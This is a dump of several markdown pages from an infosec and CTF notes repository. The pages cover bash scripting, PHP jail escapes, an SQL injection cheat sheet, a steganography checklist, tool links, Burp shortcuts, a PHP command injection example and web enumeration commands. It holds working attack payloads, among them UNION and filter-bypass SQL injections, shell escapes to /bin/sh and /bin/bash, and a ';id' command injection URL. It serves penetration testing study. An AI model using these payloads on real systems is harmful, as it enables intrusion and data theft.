style="success" %} 4 | Hack Responsibly. 5 | 6 | Always ensure you have **explicit** permission to access any computer system **before** using any of the techniques contained in these documents. You accept full responsibility for your actions by applying any knowledge gained here. 7 | {% endhint %} 8 | 9 | TODO: Separate Bash and Python scripting pages...and add more 10 | 11 | ## Bash 12 | 13 | ### Bash Scripting Basics 14 | 15 | \[+\] Shebang: 16 | 17 | ```markup 18 | #!/bin/bash 19 | ``` 20 | 21 | \[+\] Variables 22 | 23 | ```markup 24 | name=Bob 25 | echo $name 26 | user=$(whoami) 27 | echo $user 28 | echo 'Hello' $name. 'You are running as' $user. 29 | ``` 30 | 31 | \[+\] Simple script example 32 | 33 | ```bash 34 | #!/bin/bash 35 | clear 36 | echo "Hello World" 37 | name=Bob 38 | ip=`ifconfig | grep "Bcast:" | cut -d":" -f2 | cut -d" " -f1` 39 | echo "Hello" $name "Your IP address is:" $ip 40 | ``` 41 | 42 | \[+\] User Input 43 | 44 | ```bash 45 | read -p "IP: " IP 46 | ``` 47 | 48 | Example script with `read` 49 | 50 | ```bash 51 | #!/bin/bash 52 | echo "Please input the IP address" 53 | read -p "IP: " IP 54 | ping -c 5 $IP 55 | ``` 56 | 57 | \[+\] Check For No User Input 58 | 59 | ```bash 60 | if [ -z $domain ]; then 61 | echo 62 | echo "#########################" 63 | echo 64 | echo "Invalid choice." 65 | echo 66 | exit 67 | fi 68 | ``` 69 | 70 | \[+\] For loops 71 | 72 | ```bash 73 | #!/bin/bash 74 | for host in $(cat hosts.txt) 75 | do 76 | echo $host 77 | done 78 | ``` 79 | 80 | \[+\] Port Scan one liner 81 | 82 | ```bash 83 | for port in $(cat Ports.txt); do nc -nzv 192.168.0.1 $port & sleep 0.5; done 84 | ``` 85 | 86 | ### Check for root privileges 87 | 88 | When user account created a user ID is assigned to each user. BASH shell stores the user ID in the $UID environment variable. The effective user ID is stored in the $EUID variable. 89 | 90 | You can easily add a simple check at the start of a script to make sure it is being run with root privileges. 91 | 92 | #### Old way to check for root privileges 93 | 94 | ```text 95 | #!/bin/bash 96 | 97 | # Make sure only the root user can run the script 98 | # Or it is run with sudo 99 | if [ "$(id -u)" != "0" ]; then 100 | echo "This script must be run as root." 1>&2 101 | exit 1 102 | fi 103 | ``` 104 | 105 | #### New way: Using EUID 106 | 107 | ```text 108 | #!/bin/bash 109 | 110 | # Make sure only the root user can run our script 111 | # Or it is run with sudo 112 | if [[ $EUID -ne 0 ]]; then 113 | echo "This script must be run as root." 1>&2 114 | exit 1 115 | fi 116 | ``` 117 | 118 | ### MISC 119 | 120 | [https://www.techbrown.com/most-useful-bash-scripts-linux-sysadmin/](https://www.techbrown.com/most-useful-bash-scripts-linux-sysadmin/) 121 | 122 | ```text 123 | wget https://raw.githubusercontent.com/sathisharthar/Admin-Scripts/master/sysinop 124 | ``` 125 | 126 | Add to `multitool.sh`:create wordlists with cewl & Hashcat; add add options to use mangling rules; 127 | 128 | Add to `multitool.sh`: crack passwords with Hashcat 129 | 130 | ```bash 131 | #crack passwords with hashcat; 132 | 133 | #get user input for attack type - make attack type listing with numeric selections; 134 | 135 | #get user input for hash type 136 | 137 | hashcat --help | grep -i $hash_selection 138 | #|>then prompt user to input the hash type # identifier; 139 | 140 | #Get user input for file with hashes to crack 141 | #|>Check if hashlist includes usernames (in format username:hash) 142 | #|>if so add --username to hashcat syntax 143 | 144 | #Get user input for password list to use for cracking 145 | 146 | #Ask user if they want to apply any mangling rules or a mask 147 | #|>if mask is chosen display a short help screen of default mask types 148 | #|>as well as describe -1 and -2 user masks 149 | #|>make sure character escapes work properly and don't cause problems below 150 | 151 | echo '\?l = abcdefghijklmnopqrstuvwxyz' 152 | echo '\?u = ABCDEFGHIJKLMNOPQRSTUVWXYZ' 153 | echo '\?d = 0123456789' 154 | echo '\?s = \!\"\#\$\%\&\'\(\)\*\+\,\-\.\/\:\;\<\=\>\?\@\[\]\^\_\`\{\|\}\~' 155 | echo '\?a = \?l\?u\?d\?s' 156 | echo '\?b = 0x00 - 0xff' 157 | 158 | #basic execution syntax: 159 | hashcat -D1,2 -O --force -a $attack_type -m $hash_id $hash_list $pass_list 160 | 161 | #find out if hashcat has problems with blank variables 162 | #|>if not then add variables for the proper flags + user input for mangling/masks 163 | #|>ex: rules="-r $user_rules" 164 | ``` 165 | 166 | ## Python 167 | 168 | ### Python Functions 169 | 170 | * Files: [https://www.w3schools.com/python/python\_ref\_file.asp](https://www.w3schools.com/python/python_ref_file.asp) 171 | * Strings: [https://www.w3schools.com/python/python\_ref\_string.asp](https://www.w3schools.com/python/python_ref_string.asp) 172 | * Keyworks: [https://www.w3schools.com/python/python\_ref\_keywords.asp](https://www.w3schools.com/python/python_ref_keywords.asp) 173 | * Random: [https://www.w3schools.com/python/module\_random.asp](https://www.w3schools.com/python/module_random.asp) 174 | 175 | ### Dealing with Sockets 176 | 177 | [https://pequalsnp-team.github.io/cheatsheet/socket-basics-py-js-rb](https://pequalsnp-team.github.io/cheatsheet/socket-basics-py-js-rb) 178 | 179 | ### MISC 180 | 181 | ```python 182 | #checks the output from crypto and sees if at least 60% is ascii letters and returns true for possible plaintext 183 | def is_plaintext(ptext): 184 | num_letters = sum(map(lambda x : 1 if x in string.ascii_letters else 0, ptext)) 185 | if num_letters / len(ptext) >= .6: 186 | return True 187 | ``` 188 | 189 | ## PHP 190 | 191 | ### PHP Functions 192 | 193 | * Files: [https://www.w3schools.com/php/php\_ref\_filesystem.asp](https://www.w3schools.com/php/php_ref_filesystem.asp) 194 | * Directories: [https://www.w3schools.com/php/php\_ref\_directory.asp](https://www.w3schools.com/php/php_ref_directory.asp) 195 | * Errors: [https://www.w3schools.com/php/php\_ref\_error.asp](https://www.w3schools.com/php/php_ref_error.asp) 196 | * Network: [https://www.w3schools.com/php/php\_ref\_network.asp](https://www.w3schools.com/php/php_ref_network.asp) 197 | * Misc: [https://www.w3schools.com/php/php\_ref\_misc.asp](https://www.w3schools.com/php/php_ref_misc.asp) 198 | 199 | ### PHP Server 200 | 201 | [https://www.php.net/manual/en/features.commandline.webserver.php](https://www.php.net/manual/en/features.commandline.webserver.php) When starting php -S on a mac \(in my case macOS Sierra\) to host a local server, I had trouble with connecting from legacy Java. As it turned out, if you started the php server with `php -S localhost:80` the server will be started with ipv6 support only! To access it via ipv4, you need to change the start up command like so: `php -S 127.0.0.1:80` which starts server in ipv4 mode only. 202 | 203 | It’s not mentioned directly, and may not be obvious, but you can also use this to create a virtual host. This, of course, requires the help of your hosts file. Here are the steps: 204 | 205 | ```text 206 | 1 /etc/hosts 207 | 127.0.0.1 www.example.com 208 | 2 cd [root folder] 209 | php -S www.example.com:8000 210 | 3 Browser: 211 | http://www.example.com:8000/index.php 212 | ``` 213 | 214 | In order to set project specific configuration options, simply add a php.ini file to your project, and then run the built-in server with this flag: `php -S localhost:8000 -c php.ini` 215 | 216 | Example \#6 Accessing the CLI Web Server From Remote Machines You can make the web server accessible on port 8000 to any interface with: `$ php -S 0.0.0.0:8000` 217 | 218 | Example \#2 Starting with a specific document root directory 219 | 220 | ```text 221 | $ cd ~/public_html 222 | $ php -S localhost:8000 -t foo/ 223 | Listening on localhost:8000 224 | Document root is /home/me/public_html/foo 225 | ``` 226 | 227 | ### PHP Jail Escape 228 | 229 | _With file\_get\_contents\(\)_ 230 | 231 | ```php 232 | print file_get_contents('flag.txt'); 233 | ``` 234 | 235 | _With readfile\(\)_ 236 | 237 | ```php 238 | echo readfile("flag.txt"); 239 | ``` 240 | 241 | _With popen\(\)_ 242 | 243 | ```php 244 | popen("vi", "w"); 245 | 246 | :r flag.txt 247 | or 248 | :!/bin/bash 249 | ``` 250 | 251 | _With highlight\_file\(\)_ 252 | 253 | ```php 254 | highlight_file(glob("flag.txt")[0]); 255 | or 256 | highlight_file(glob("fl*txt")[0]); 257 | ``` 258 | 259 | _With highlight\_source\(\)_ 260 | 261 | ```php 262 | highlight_source("flag.txt"); 263 | or 264 | highlight_source(glob("*")[4]); 265 | ``` 266 | 267 | _With Finfo\(\)_ 268 | 269 | ```php 270 | new Finfo(0,glob(hex2bin(hex2bin(3261)))[0]); 271 | ``` 272 | 273 | If you like this content and would like to see more, please consider [buying me a coffee](https://www.buymeacoffee.com/zweilosec)! 274 | 275 | -------------------------------------------------------------------------------- /os-agnostic/sql.md: -------------------------------------------------------------------------------- 1 | # SQL 2 | 3 | {% hint style="success" %} 4 | Hack Responsibly. 5 | 6 | Always ensure you have **explicit** permission to access any computer system **before** using any of the techniques contained in these documents. You accept full responsibility for your actions by applying any knowledge gained here. 7 | {% endhint %} 8 | 9 | ## SQLi - SQL Injection 10 | 11 | * [SQL Injection Cheatsheet](https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/) 12 | * [https://portswigger.net/web-security/sql-injection/cheat-sheet](https://portswigger.net/web-security/sql-injection/cheat-sheet) 13 | 14 | Blind SQL injection UNIoN queries: [Ippsec:HacktheBox - Charon](https://www.youtube.com/watch?v=\_csbKuOlmdE) use `CONCAT("x","x")` 15 | 16 | ### SQL Injection Tips 17 | 18 | `--` -> Comments in Linux\ 19 | `--+` -> Comments in Windows\ 20 | `%23 (#)` -> Hash Symbol\ 21 | `%2527 (')` -> to bypass urldecode(urldecode(htmlspecialchars(, ENT\_QUOTES))); 22 | 23 | ### String concatenation 24 | 25 | You can concatenate together multiple strings to make a single string. 26 | 27 | | Oracle | `'foo'\|\|'bar'` | 28 | | ---------- | ---------------------------------------------------------------------------------------------------------------- | 29 | | Microsoft | `'foo'+'bar'` | 30 | | PostgreSQL | `'foo'\|\|'bar'` | 31 | | MySQL |

'foo' 'bar' [Note the space between the two strings]
CONCAT('foo','bar')

| 32 | 33 | ### Substring 34 | 35 | You can extract part of a string, from a specified offset with a specified length. Note that the offset index is 1-based. Each of the following expressions will return the string `ba`. 36 | 37 | | Oracle | `SUBSTR('foobar', 4, 2)` | 38 | | ---------- | --------------------------- | 39 | | Microsoft | `SUBSTRING('foobar', 4, 2)` | 40 | | PostgreSQL | `SUBSTRING('foobar', 4, 2)` | 41 | | MySQL | `SUBSTRING('foobar', 4, 2)` | 42 | 43 | ### Comments 44 | 45 | You can use comments to truncate a query and remove the portion of the original query that follows your input. 46 | 47 | | Oracle |

--comment

| 48 | | ---------- | -------------------------------------------------------------------------------------------------------------------------- | 49 | | Microsoft |

--comment
/*comment*/

| 50 | | PostgreSQL |

--comment
/*comment*/

| 51 | | MySQL |

#comment
-- comment [Note the space after the double dash]
/*comment*/

| 52 | 53 | ### Database version 54 | 55 | You can query the database to determine its type and version. This information is useful when formulating more complicated attacks. 56 | 57 | | Oracle |

SELECT banner FROM v$version
SELECT version FROM v$instance

| 58 | | ---------- | ---------------------------------------------------------------------------------------------------------------- | 59 | | Microsoft | `SELECT @@version` | 60 | | PostgreSQL | `SELECT version()` | 61 | | MySQL | `SELECT @@version` | 62 | 63 | ### Database contents 64 | 65 | You can list the tables that exist in the database, and the columns that those tables contain. 66 | 67 | | Oracle |

SELECT * FROM all_tables
SELECT * FROM all_tab_columns WHERE table_name = 'TABLE-NAME-HERE'

| 68 | | ---------- | -------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | 69 | | Microsoft |

SELECT * FROM information_schema.tables
SELECT * FROM information_schema.columns WHERE table_name = 'TABLE-NAME-HERE'

| 70 | | PostgreSQL |

SELECT * FROM information_schema.tables
SELECT * FROM information_schema.columns WHERE table_name = 'TABLE-NAME-HERE'

| 71 | | MySQL |

SELECT * FROM information_schema.tables
SELECT * FROM information_schema.columns WHERE table_name = 'TABLE-NAME-HERE'

| 72 | 73 | ### Conditional errors 74 | 75 | You can test a single boolean condition and trigger a database error if the condition is true. 76 | 77 | | Oracle | `SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN to_char(1/0) ELSE NULL END FROM dual` | 78 | | ---------- | --------------------------------------------------------------------------------------- | 79 | | Microsoft | `SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN 1/0 ELSE NULL END` | 80 | | PostgreSQL | `SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN cast(1/0 as text) ELSE NULL END` | 81 | | MySQL | `SELECT IF(YOUR-CONDITION-HERE,(SELECT table_name FROM information_schema.tables),'a')` | 82 | 83 | ### Batched (or stacked) queries 84 | 85 | You can use batched queries to execute multiple queries in succession. Note that while the subsequent queries are executed, the results are not returned to the application. Hence this technique is primarily of use in relation to blind vulnerabilities where you can use a second query to trigger a DNS lookup, conditional error, or time delay. 86 | 87 | | Oracle | `Does not support batched queries.` | 88 | | ---------- | ----------------------------------- | 89 | | Microsoft | `QUERY-1-HERE; QUERY-2-HERE` | 90 | | PostgreSQL | `QUERY-1-HERE; QUERY-2-HERE` | 91 | | MySQL | `QUERY-1-HERE; QUERY-2-HERE` | 92 | 93 | {% hint style="info" %} 94 | **Note:** With MySQL, batched queries typically cannot be used for SQL injection. However, this is occasionally possible if the target application uses certain PHP or Python APIs to communicate with a MySQL database. 95 | {% endhint %} 96 | 97 | ### Time delays 98 | 99 | You can cause a time delay in the database when the query is processed. The following will cause an unconditional time delay of 10 seconds. 100 | 101 | | Oracle | `dbms_pipe.receive_message(('a'),10)` | 102 | | ---------- | ------------------------------------- | 103 | | Microsoft | `WAITFOR DELAY '0:0:10'` | 104 | | PostgreSQL | `SELECT pg_sleep(10)` | 105 | | MySQL | `SELECT sleep(10)` | 106 | 107 | ### Conditional time delays 108 | 109 | You can test a single boolean condition and trigger a time delay if the condition is true. 110 | 111 | | Oracle | `SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN 'a'\|\|dbms_pipe.receive_message(('a'),10) ELSE NULL END FROM dual` | 112 | | ---------- | ---------------------------------------------------------------------------------------------------------------- | 113 | | Microsoft | `IF (YOUR-CONDITION-HERE) WAITFOR DELAY '0:0:10'` | 114 | | PostgreSQL | `SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN pg_sleep(10) ELSE pg_sleep(0) END` | 115 | | MySQL | `SELECT IF(YOUR-CONDITION-HERE,sleep(10),'a')` | 116 | 117 | ### Manual UNION SQLite Injection 118 | 119 | _Table_ 120 | 121 | ```sql 122 | 1' union all select 1,tbl_name,3 FROM sqlite_master WHERE type='table' limit 0,1 -- 123 | ``` 124 | 125 | _Columns (as command)_ 126 | 127 | ```sql 128 | 1' union all select 1,sql,3 FROM sqlite_master WHERE type='table' and tbl_name='nameoftable' limit 0,1 -- 129 | ``` 130 | 131 | _Values (payload depends on the columns structure)_ 132 | 133 | ```sql 134 | 1' union all select 1,"nameofcolumn",3 FROM "nameoftable" limit 2,1 -- 135 | ``` 136 | 137 | ### Manual UNION SQL Injection 138 | 139 | _Table_ 140 | 141 | ```sql 142 | 1' union select (select group_concat(TABLE_NAME) from information_schema.TABLES where TABLE_SCHEMA=database()),2# 143 | ``` 144 | 145 | _Columns_ 146 | 147 | ```sql 148 | 1' union select (select group_concat(COLUMN_NAME) from information_schema.COLUMNS where TABLE_NAME='nameoftable'),2# 149 | ``` 150 | 151 | _Values_ 152 | 153 | ```sql 154 | 1' union select (select nameofcolumn from nameoftable limit 0,1),2# 155 | ``` 156 | 157 | _Using Newline_ 158 | 159 | ```sql 160 | admin %0A union %0A select %0A 1,database()# 161 | or 162 | admin %0A union %0A select %0A database(),2# 163 | ``` 164 | 165 | _Bypass preg\_replace_ 166 | 167 | ```sql 168 | ununionion select 1,2%23 169 | or 170 | UNunionION SEselectLECT 1,2,3%23 171 | ``` 172 | 173 | ## Misc 174 | 175 | get shell in mysql: `\! /bin/sh` 176 | 177 | 178 | 179 | If you like this content and would like to see more, please consider [buying me a coffee](https://www.buymeacoffee.com/zweilosec)! 180 | -------------------------------------------------------------------------------- /os-agnostic/steganography.md: -------------------------------------------------------------------------------- 1 | # Steganography 2 | 3 | {% hint style="success" %} 4 | Hack Responsibly. 5 | 6 | Always ensure you have **explicit** permission to access any computer system **before** using any of the techniques contained in these documents. You accept full responsibility for your actions by applying any knowledge gained here. 7 | {% endhint %} 8 | 9 | ## Steganography Checklist 10 | 11 | TODO: clean up steganography CTF checklist \(issue [\#17](https://github.com/zweilosec/Infosec-Notes/issues/17)\) 12 | 13 | * Properly link all tools and attributions 14 | * Add description for what the checklist is for 15 | * Make sure all tools still exist 16 | * Check author's site for updates 17 | * Add "Resources" section at bottom 18 | * Find link for "feature for randomizing the color palette" \(section 10.ii\) on author's site 19 | * credit to [Ge0rg3](https://github.com/Ge0rg3) for this great checklist. His site also has custom examples for each situation below. 20 | * File 1. Just to be sure what filetype you are facing, check with `type `. 2. If something seems strange, the next step would be to open the file with `GHex` and check the files "magic bytes". Sometimes they are missing, or have been corrupted or obscured. 21 | * Strings 22 | 1. View all strings in the file with `strings -n 6 -t x `. 23 | 1. I typically use `-n 6` to find strings of length 6+, and `-t x` to view their position in the file. 24 | 2. Alternatively, you can view strings on [this site](https://georgeom.net/StegOnline/upload) once an image has been uploaded. 25 | * Exif 26 | 1. Check all image metadata. I would recommend [Jeffrey's Image Metadata Viewer](http://exif.regex.info/exif.cgi) for in-depth analysis. `Exiftool` is another common one. 27 | * Binwalk 28 | 1. Next you can use `binwalk` to check images for hidden embedded files. 29 | 2. My preferred syntax is `binwalk -Me `. `-Me` is used to recursively extract any files. 30 | * pngcheck 31 | 1. We can use `pngcheck` to look for optional/correct broken chunks. This is vital if the image appears corrupt. 32 | 2. Run `pngcheck -vtp7f ` to view all info. 33 | 3. `-v` is for verbose, `-t` and `-7` display tEXt chunks, `-p` displays contents of some other optional chunks and `-f` forces continuation if major errors are encountered. 34 | 4. Related write-ups: PlaidCTF 2015, SECCON Quals 2015 35 | * Explore Color & Bit Planes 36 | 1. Images can be hidden inside of the color/bit planes. Upload your image to [this site](https://georgeom.net/StegOnline/upload), then on the image menu page explore all options in the top panel \(i.e. Full Red, Inverse, LSB etc\). 37 | 2. Go to "Browse Bit Planes", and browse through all available planes. 38 | 3. If there appears to be some static at the top of any planes, try extracting the data from them in the "Extract Files/Data" menu. 39 | 4. Related write-ups: MicroCTF 2017, CSAW Quals 2016, ASIS Cyber Security Contest Quals 2014, Cybersocks Regional 2016 40 | * Extract Least Significant Bit \(LSB\) Data 41 | 1. As mentioned in step 6.3, there could be some static in bit planes. If so, navigate to the "Extract Files/Data" page, and select the relevant bits. 42 | * Check RGB Values 43 | 1. ASCII Characters/other data can be hidden in the RGB\(A\) values of an image. 44 | 2. Upload your image [here](https://georgeom.net/StegOnline/upload) and preview the RGBA values. Try converting them to text, and see if any flag is found. It might be worth looking at just the R/G/B/A values on their own. 45 | 3. Related write-ups: MMA-CTF-2015 46 | * Steghide 47 | 1. Found a password? \(Or not?\) 48 | 2. If you've found a password, the go-to application to check should be `steghide`. Bear in mind that this can sometimes be used without a password, too. 49 | 3. You can extract data by running `steghide extract -sf `. 50 | 4. Other stego tools \(may need passwords to retrieve information\): 51 | 1. OpenStego, 52 | 2. Stegpy 53 | 3. Outguess 54 | 4. jphide 55 | 5. Associated writeups: Pragyan CTF 2017, Xiomara 2019, CSAW Quals 2015, BlackAlps Y-NOT-CTF \(JFK Challenge\) 56 | * Browse Color Palette 57 | 1. If the PNG is in type 3, you should look through the color palette. 58 | 2. This site \(TODO: find site link\) has a feature for randomizing the color palette, which may reveal the flag. You can also browse through each color in the palette, if the flag is the same color. 59 | 3. It may also be worth looking at the palette indexes themselves, as a string may be visible from there. 60 | 4. Related write-ups: Plain CTF 2014 61 | * Pixel Value Differencing \(PVD/MPVD\) 62 | 1. This is a method where the differences between pixel pairs are measured slightly adjusted in order to hide data. 63 | 2. It would be rare to have a case of PVD where you're not explicitly told \(or perhaps hinted at\) that this is the steganographic method, as it's very niche. 64 | 3. Related write-ups: TJCTF 2019, MMA-CTF 2015 65 | 66 | ## Misc 67 | 68 | `StegCracker` - [https://pypi.org/project/stegcracker/](https://pypi.org/project/stegcracker/) - bruteforce tool for finding `steghide` passwords and extract \(works well, uses `rockyou.txt` as default wordlist\) 69 | 70 | extract files from stego'd files: `binwalk -Me ` 71 | 72 | [http://bigwww.epfl.ch/demo/ip/demos/FFT/](http://bigwww.epfl.ch/demo/ip/demos/FFT/) - Fast Fourier Transform online tool. Check this to test stego images that cant be solved with other stuff 73 | 74 | [https://0xrick.github.io/lists/stego/](https://0xrick.github.io/lists/stego/) [https://github.com/DominicBreuker/stego-toolkit/blob/master/README.md\#tools](https://github.com/DominicBreuker/stego-toolkit/blob/master/README.md#tools) [https://pequalsnp-team.github.io/cheatsheet/steganography-101](https://pequalsnp-team.github.io/cheatsheet/steganography-101) 75 | 76 | ## References 77 | 78 | * [https://georgeom.net/StegOnline/checklist](https://georgeom.net/StegOnline/checklist) 79 | 80 | 81 | 82 | If you like this content and would like to see more, please consider [buying me a coffee](https://www.buymeacoffee.com/zweilosec)! 83 | 84 | -------------------------------------------------------------------------------- /tools-cheatsheets/README.md: -------------------------------------------------------------------------------- 1 | --- 2 | description: A collection of outside resources on various InfoSec-related subjects. 3 | --- 4 | 5 | # Tools & Cheatsheets 6 | 7 | {% hint style="success" %} 8 | Hack Responsibly. 9 | 10 | Always ensure you have **explicit** permission to access any computer system **before** using any of the techniques contained in these documents. You accept full responsibility for your actions by applying any knowledge gained here. 11 | {% endhint %} 12 | 13 | ## Useful Tools 14 | 15 | * [https://app.diagrams.net/](https://app.diagrams.net/) 16 | * Network Diagramming \(Free Online Visio Replacement\) 17 | 18 | ## OSCP Cheatsheets 19 | 20 | * [https://github.com/s0wr0b1ndef/OSCP-Biggest-Reference-Bank/blob/master/Cheatsheet\_PenTesting.txt](https://github.com/s0wr0b1ndef/OSCP-Biggest-Reference-Bank/blob/master/Cheatsheet_PenTesting.txt) 21 | * [https://github.com/so87/OSCP-PwK/blob/master/Penetration%20Testing%20Tools.pdf](https://github.com/so87/OSCP-PwK/blob/master/Penetration%20Testing%20Tools.pdf) 22 | * [https://securism.wordpress.com/oscp-notes-information-gathering/](https://securism.wordpress.com/oscp-notes-information-gathering/) 23 | * [https://github.com/Elinpf/OSCP-survival-guide](https://github.com/Elinpf/OSCP-survival-guide) 24 | * [https://oscp.infosecsanyam.in/cheatsheet-short](https://oscp.infosecsanyam.in/cheatsheet-short) 25 | * [https://github.com/slyth11907/Cheatsheets](https://github.com/slyth11907/Cheatsheets) 26 | * [https://oscp.infosecsanyam.in/one-page-methodology](https://oscp.infosecsanyam.in/one-page-methodology) 27 | * [https://github.com/The-Lynx-Team/OSCP](https://github.com/The-Lynx-Team/OSCP) 28 | 29 | ## CTF Cheatsheats 30 | 31 | * [https://github.com/Ganapati/RsaCtfTool](https://github.com/Ganapati/RsaCtfTool) <-- RSA cracking tools //"un-cipher" data from weak public key and try to recover 5KFB6 private key 32 | * [https://www.capturetheflags.com/tools-for-ctf/](https://www.capturetheflags.com/tools-for-ctf/) <--Has both linux and windows 33 | * [https://github.com/apsdehal/aWEsoMe-cTf](https://github.com/apsdehal/aWEsoMe-cTf) 34 | * [https://github.com/zardus/ctf-tools](https://github.com/zardus/ctf-tools) 35 | * [https://dvd848.github.io/CTFs/](https://dvd848.github.io/CTFs/) 36 | * [https://github.com/ryanking13/ctf-cheatsheet](https://github.com/ryanking13/ctf-cheatsheet) 37 | * [https://github.com/w181496/Web-CTF-Cheatsheet](https://github.com/w181496/Web-CTF-Cheatsheet) 38 | 39 | ## Infosec Cheatsheets 40 | 41 | * [https://nikolaskama.me/infosec-cheat-sheets/](https://nikolaskama.me/infosec-cheat-sheets/) 42 | * [https://www.peerlyst.com/posts/the-complete-list-of-infosec-related-cheat-sheets-claus-cramon](https://www.peerlyst.com/posts/the-complete-list-of-infosec-related-cheat-sheets-claus-cramon) 43 | 44 | ## Scripting Cheatsheets 45 | 46 | * [https://pequalsnp-team.github.io/cheatsheet/socket-basics-py-js-rb](https://pequalsnp-team.github.io/cheatsheet/socket-basics-py-js-rb) 47 | 48 | ## Cryptography Cheatsheets 49 | 50 | * [https://pequalsnp-team.github.io/cheatsheet/crypto-101](https://pequalsnp-team.github.io/cheatsheet/crypto-101) 51 | 52 | ## Steganography Cheatsheets 53 | 54 | * [https://georgeom.net/StegOnline/checklist](https://georgeom.net/StegOnline/checklist) 55 | 56 | ## MISC 57 | 58 | [https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/](https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/) 59 | 60 | 61 | 62 | If you like this content and would like to see more, please consider [buying me a coffee](https://www.buymeacoffee.com/zweilosec)! 63 | 64 | -------------------------------------------------------------------------------- /web/burp-suite.md: -------------------------------------------------------------------------------- 1 | # Burp Suite 2 | 3 | ## Burp Cheat Sheet 4 | 5 | [Burp Suite](https://portswigger.net/burp) is a a web application security testing framework by PortSwigger. 6 | 7 | Below is a selection of commands for improving your workflow. 8 | 9 | ## Global commands 10 | 11 | | Command | Action | 12 | | -------------- | --------------------------------- | 13 | | `Ctrl+R` | Send to Repeater | 14 | | `Ctrl+I` | Send to Intruder | 15 | | `Ctrl+T` | Toggle Proxy interception | 16 | | `Ctrl+F` | Forward intercepted Proxy message | 17 | | `Ctrl+Shift+T` | Switch to Target | 18 | | `Ctrl+Shift+P` | Switch to Proxy | 19 | | `Ctrl+Shift+R` | Switch to Repeater | 20 | | `Ctrl+Shift+S` | Switch to Scanner | 21 | | `Ctrl+Shift+I` | Switch to Intruder | 22 | | `Ctrl+Shift+O` | Switch to Suite options | 23 | | `Ctrl+Shift+A` | Switch to Alerts tab | 24 | | `Ctrl+Equals` | Go to next tab | 25 | | `Ctrl+Minus` | Go to previous tab | 26 | 27 | Editor Commands 28 | 29 | 30 | | Command | Action | 31 | | ------------------ | ------------------------------------------- | 32 | | `Ctrl+S` | Search | 33 | | `Ctrl+Period` | Go to next search match | 34 | | `Ctrl+Comma` | Go to previous search match | 35 | | `Ctrl+U` | URL-encode current selection | 36 | | `Ctrl+Shift+U` | URL-decode current selection | 37 | | `Ctrl+H` | HTML-encode current selection | 38 | | `Ctrl+Shift+H` | HTML-decode current selection | 39 | | `Ctrl+B` | Base64-encode current selection | 40 | | `Ctrl+Shift+B` | Base64-decode current selection | 41 | | `Ctrl+Delete` | Delete word | 42 | | `Ctrl+Backspace` | Backspace word | 43 | | `Ctrl+D` | Delete line | 44 | | `Ctrl+Right` | Go to next word | 45 | | `Ctrl+Shift+Right` | Go to next word (extend selection) | 46 | | `Ctrl+Left` | Go to previous word | 47 | | `Ctrl+Shift+Left` | Go to previous word (extend selection) | 48 | | `Ctrl+Down` | Go to next paragraph | 49 | | `Ctrl+Shift+Down` | Go to next paragraph (extend selection) | 50 | | `Ctrl+Up` | Go to previous paragraph | 51 | | `Ctrl+Shift+Up` | Go to previous paragraph (extend selection) | 52 | | `Ctrl+Home` | Go to start of document | 53 | | `Ctrl+Shift+Home` | Go to start of document (extend selection) | 54 | | `Ctrl+End` | Go to end of document | 55 | | `Ctrl+Shift+End` | Go to end of document (extend selection) | 56 | 57 | ## References 58 | 59 | * https://github.com/mccabe615/BurpCheatSheet 60 | 61 | -------------------------------------------------------------------------------- /web/web-notes/command-injection.md: -------------------------------------------------------------------------------- 1 | # Command Injection 2 | 3 | ## Command Injection 4 | 5 | {% embed url="https://owasp.org/www-community/attacks/Command_Injection" %} 6 | 7 | ### PHP Command Injection 8 | 9 | The following PHP code snippet is vulnerable to a command injection attack: 10 | 11 | ```php 12 | "); 15 | $file=$_GET['filename']; 16 | system("rm $file"); 17 | ?> 18 | ``` 19 | 20 | The following request is an example of that will successful attack on the previous PHP code, and will output the results of the `id` command: `http://127.0.0.1/delete.php?filename=bob.txt;id`. Look for exposed `$_GET['filename']` type variables that take input from the user, or can be injected into from the URL. This combined with `system("")` will allow for command injection. 21 | 22 | -------------------------------------------------------------------------------- /web/web-notes/enumeration.md: -------------------------------------------------------------------------------- 1 | # Enumeration 2 | 3 | {% hint style="success" %} 4 | Hack Responsibly. 5 | 6 | Always ensure you have **explicit** permission to access any computer system **before** using any of the techniques contained in these documents. You accept full responsibility for your actions by applying any knowledge gained here. 7 | {% endhint %} 8 | 9 | ## Web Application Enumeration 10 | 11 | [w3af](http://w3af.org/) is an open source python-based Web Application Attack and Audit Framework. 12 | 13 | > The project’s goal is to create a framework to help you secure your web applications by finding and exploiting all web application vulnerabilities. 14 | 15 | It can also be abused by attackers to find and enumerate weaknesses in web applications and can be downloaded and run with the following commands: 16 | 17 | ```bash 18 | git clone --depth 1 https://github.com/andresriancho/w3af.git 19 | cd w3af 20 | ./w3af_gui 21 | ``` 22 | 23 | ## HTTP Enumeration 24 | 25 | ### Subdomain enumeration 26 | 27 | [https://sidxparab.gitbook.io/subdomain-enumeration-guide/](https://sidxparab.gitbook.io/subdomain-enumeration-guide/) 28 | 29 | ### dirsearch 30 | 31 | [https://github.com/maurosoria/dirsearch](https://github.com/maurosoria/dirsearch) 32 | 33 | ``` 34 | python3 dirsearch.py -e php,html,js -u https://target -w /path/to/wordlist 35 | ``` 36 | 37 | ### gobuster: 38 | 39 | ``` 40 | gobuster -w /usr/share/wordlists/dirb/common.txt -u $ip 41 | ``` 42 | 43 | ### DirBuster - Http folder enumeration - can take a dictionary file 44 | 45 | ### Dirb 46 | 47 | * Directory brute force finding using a dictionary file 48 | 49 | ``` 50 | dirb http://$ip/ wordlist.dict 51 | 52 | dirb <> 53 | ``` 54 | 55 | * Dirb against a proxy 56 | 57 | ``` 58 | dirb http://$ip/ -p $ip:$port 59 | ``` 60 | 61 | ### Nikto 62 | 63 | ``` 64 | nikto -h $ip 65 | ``` 66 | 67 | * Proxy Enumeration (useful for open proxies) 68 | 69 | ``` 70 | nikto -useproxy http://$ip:3128 -h $ip 71 | ``` 72 | 73 | ### Nmap HTTP Enumeration 74 | 75 | ``` 76 | nmap --script=http-enum -p80 -n $ip/24 77 | ``` 78 | 79 | * Nmap Check the server methods 80 | 81 | 